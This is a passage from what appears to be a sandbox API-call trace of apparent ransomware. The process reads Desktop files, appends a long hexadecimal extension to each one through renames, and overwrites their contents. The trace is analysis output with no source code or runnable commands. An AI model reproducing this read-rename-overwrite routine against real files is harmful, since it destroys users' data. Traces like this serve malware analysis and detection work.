Flags=0x8, Size=0x106) returned 0x42673c8 [0166.165] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42673c8, Length=0x106, FileInformationClass=0xa) returned 0x0 [0166.167] CloseHandle (hObject=0x5ac) returned 1 [0166.167] GetProcessHeap () returned 0x270000 [0166.169] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.172] RtlInterlockedCompareExchange64 () returned 0x1 [0166.172] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.177] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.177] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.179] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.181] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg", lpString2=".D9FF3DBBB5DEB0B2C11A141E314281020D998BFD4787F87C7A3F1C00248AC46E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg.D9FF3DBBB5DEB0B2C11A141E314281020D998BFD4787F87C7A3F1C00248AC46E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg.D9FF3DBBB5DEB0B2C11A141E314281020D998BFD4787F87C7A3F1C00248AC46E" 
[0166.181] GetProcessHeap () returned 0x270000 [0166.181] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4277680 [0166.181] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x4277680, Length=0x120, FileInformationClass=0xa) returned 0x0 [0166.183] CloseHandle (hObject=0x5ac) returned 1 [0166.189] GetProcessHeap () returned 0x270000 [0166.191] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.191] RtlInterlockedCompareExchange64 () returned 0x1 [0166.192] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.196] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.196] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.198] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.199] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf", lpString2=".F70EE9D0E0BEF314C218B55111C949B7B5994C01CC58C24EF78228412C94DC36" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf.F70EE9D0E0BEF314C218B55111C949B7B5994C01CC58C24EF78228412C94DC36") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf.F70EE9D0E0BEF314C218B55111C949B7B5994C01CC58C24EF78228412C94DC36" [0166.200] GetProcessHeap () returned 0x270000 [0166.200] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f7f40 [0166.200] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f7f40, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.202] CloseHandle (hObject=0x5ac) returned 1 [0166.203] GetProcessHeap () returned 0x270000 [0166.206] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.206] RtlInterlockedCompareExchange64 () returned 0x1 [0166.206] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.209] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.209] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.211] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.212] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv", lpString2=".2A2D3CEFAB09E467CA70B052FC695B2BA9A0134A33DFBB455549117AD4971665" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv.2A2D3CEFAB09E467CA70B052FC695B2BA9A0134A33DFBB455549117AD4971665") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv.2A2D3CEFAB09E467CA70B052FC695B2BA9A0134A33DFBB455549117AD4971665" [0166.212] GetProcessHeap () returned 0x270000 [0166.212] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42f8068 [0166.212] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f8068, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0166.215] CloseHandle (hObject=0x5ac) returned 1 [0166.216] GetProcessHeap () returned 0x270000 [0166.217] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.217] RtlInterlockedCompareExchange64 () returned 0x1 [0166.217] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.219] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.219] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.221] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.222] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png", 
lpString2=".AC743C01A7E42CC1E0A69EE42423A351EA4250D91340C2FC30DBB9FACF3C8107" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png.AC743C01A7E42CC1E0A69EE42423A351EA4250D91340C2FC30DBB9FACF3C8107") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png.AC743C01A7E42CC1E0A69EE42423A351EA4250D91340C2FC30DBB9FACF3C8107" [0166.222] GetProcessHeap () returned 0x270000 [0166.222] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f8190 [0166.222] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f8190, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.223] CloseHandle (hObject=0x5ac) returned 1 [0166.224] GetProcessHeap () returned 0x270000 [0166.225] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.225] RtlInterlockedCompareExchange64 () returned 0x1 [0166.226] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.228] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.228] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.230] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.231] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4", lpString2=".FCA86301ADD7B102676C82E65EF4444FC31BE910BBCA49610C34BC2279378932" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4.FCA86301ADD7B102676C82E65EF4444FC31BE910BBCA49610C34BC2279378932") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4.FCA86301ADD7B102676C82E65EF4444FC31BE910BBCA49610C34BC2279378932" [0166.231] GetProcessHeap () returned 0x270000 [0166.231] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f82b8 [0166.231] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f82b8, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.233] CloseHandle (hObject=0x5ac) returned 1 [0166.234] GetProcessHeap () returned 0x270000 [0166.235] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.235] RtlInterlockedCompareExchange64 () returned 0x1 [0166.235] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.239] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.243] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: 
ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.244] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav", lpString2=".6024B4AADA2D7FFEA0669993A8929AEAD477AAC864974B02649F2F7C97635F47" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav.6024B4AADA2D7FFEA0669993A8929AEAD477AAC864974B02649F2F7C97635F47") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav.6024B4AADA2D7FFEA0669993A8929AEAD477AAC864974B02649F2F7C97635F47" [0166.244] GetProcessHeap () returned 0x270000 [0166.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10c) returned 0x42674e0 [0166.244] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42674e0, Length=0x10c, FileInformationClass=0xa) returned 0x0 [0166.246] CloseHandle (hObject=0x5ac) returned 1 [0166.248] GetProcessHeap () returned 0x270000 [0166.249] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.249] RtlInterlockedCompareExchange64 () returned 0x1 [0166.249] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.254] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x3a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.254] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.256] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, 
ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.257] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods", lpString2=".5136F87B0C1E1FE41030AF9DFFD08369E791180288B02106525EDBCDBC37F321" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods.5136F87B0C1E1FE41030AF9DFFD08369E791180288B02106525EDBCDBC37F321") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods.5136F87B0C1E1FE41030AF9DFFD08369E791180288B02106525EDBCDBC37F321" [0166.257] GetProcessHeap () returned 0x270000 [0166.257] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x42f83e0 [0166.257] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f83e0, Length=0x116, FileInformationClass=0xa) returned 0x0 [0166.259] CloseHandle (hObject=0x5ac) returned 1 [0166.260] GetProcessHeap () returned 0x270000 [0166.261] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.261] RtlInterlockedCompareExchange64 () returned 0x1 [0166.261] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.266] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x6600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.266] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.268] NtQueryObject 
(in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.269] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc", lpString2=".5B79792A2626C00AA21F17106AAB49DD87C63D56ABD93F53207C842538E5837C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc.5B79792A2626C00AA21F17106AAB49DD87C63D56ABD93F53207C842538E5837C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc.5B79792A2626C00AA21F17106AAB49DD87C63D56ABD93F53207C842538E5837C" [0166.269] GetProcessHeap () returned 0x270000 [0166.269] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x42f8508 [0166.269] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f8508, Length=0x116, FileInformationClass=0xa) returned 0x0 [0166.271] CloseHandle (hObject=0x5ac) returned 1 [0166.275] GetProcessHeap () returned 0x270000 [0166.276] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.276] RtlInterlockedCompareExchange64 () returned 0x1 [0166.276] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.282] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.282] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, 
lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.285] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.286] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps", lpString2=".45F237763AD2306454626A10FE6E62BD2B57B7146FD5B43E2209CC25B65BBA08" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps.45F237763AD2306454626A10FE6E62BD2B57B7146FD5B43E2209CC25B65BBA08") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps.45F237763AD2306454626A10FE6E62BD2B57B7146FD5B43E2209CC25B65BBA08" [0166.286] GetProcessHeap () returned 0x270000 [0166.286] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42f8630 [0166.287] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f8630, Length=0x118, FileInformationClass=0xa) returned 0x0 [0166.288] CloseHandle (hObject=0x5ac) returned 1 [0166.289] GetProcessHeap () returned 0x270000 [0166.291] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.291] RtlInterlockedCompareExchange64 () returned 0x1 [0166.291] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.402] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.412] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, 
lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.415] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.416] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.430] WriteFile (in: hFile=0x5ac, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.431] RtlInterlockedCompareExchange64 () returned 0x0 [0166.431] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.458] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.459] RtlInterlockedCompareExchange64 () returned 0x0 [0166.459] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.470] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.472] RtlInterlockedCompareExchange64 () returned 0x0 [0166.472] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.484] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.485] RtlInterlockedCompareExchange64 () returned 0x0 [0166.485] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.500] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.502] RtlInterlockedCompareExchange64 () returned 0x0 [0166.502] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.516] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x3600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.517] RtlInterlockedCompareExchange64 () returned 0x0 [0166.517] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, 
lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.537] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.539] RtlInterlockedCompareExchange64 () returned 0x0 [0166.539] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.552] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x7400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.553] RtlInterlockedCompareExchange64 () returned 0x0 [0166.553] GetQueuedCompletionStatus (in: 